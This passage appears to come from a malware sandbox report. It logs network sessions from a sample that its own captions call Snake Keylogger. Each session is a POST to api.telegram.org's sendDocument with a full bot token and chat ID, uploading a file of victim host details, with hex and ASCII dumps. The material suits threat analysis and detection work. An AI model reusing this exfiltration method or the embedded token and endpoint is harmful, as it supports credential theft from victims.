                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:52 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:52 UTC286INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66937,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228831,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            17192.168.2.549785149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:45 UTC28OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d875d3f9
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:45 UTC29OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 38 37 35 64 33 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d875d3f9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:45 UTC29INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:45 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:45 UTC29INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66764,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228765,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            170192.168.2.550026149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:52 UTC287OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575700385bfd
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:52 UTC287OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 30 33 38 35 62 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575700385bfdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:52 UTC287INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:52 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:52 UTC288INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66938,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228832,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            171192.168.2.550028149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:52 UTC288OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570073f6e2
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:52 UTC289OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 30 37 33 66 36 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570073f6e2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:52 UTC289INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:52 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:52 UTC289INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66939,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228832,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            172192.168.2.550029149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:52 UTC290OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575700b1f3ff
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:52 UTC290OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 30 62 31 66 33 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575700b1f3ffContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:53 UTC291INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:53 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:53 UTC291INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66940,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228833,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            173192.168.2.550030149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:53 UTC292OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575700fe3f2e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:53 UTC292OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 30 66 65 33 66 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575700fe3f2eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:53 UTC292INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:53 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:53 UTC293INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66942,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228833,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            174192.168.2.550031149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:53 UTC293OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757013c3be7
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:53 UTC294OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 31 33 63 33 62 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757013c3be7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:54 UTC294INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:54 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:54 UTC295INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66943,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228834,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            175192.168.2.550032149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:54 UTC295OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570177d6be
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:54 UTC295OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 31 37 37 64 36 62 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570177d6beContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:54 UTC296INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:54 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:54 UTC296INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
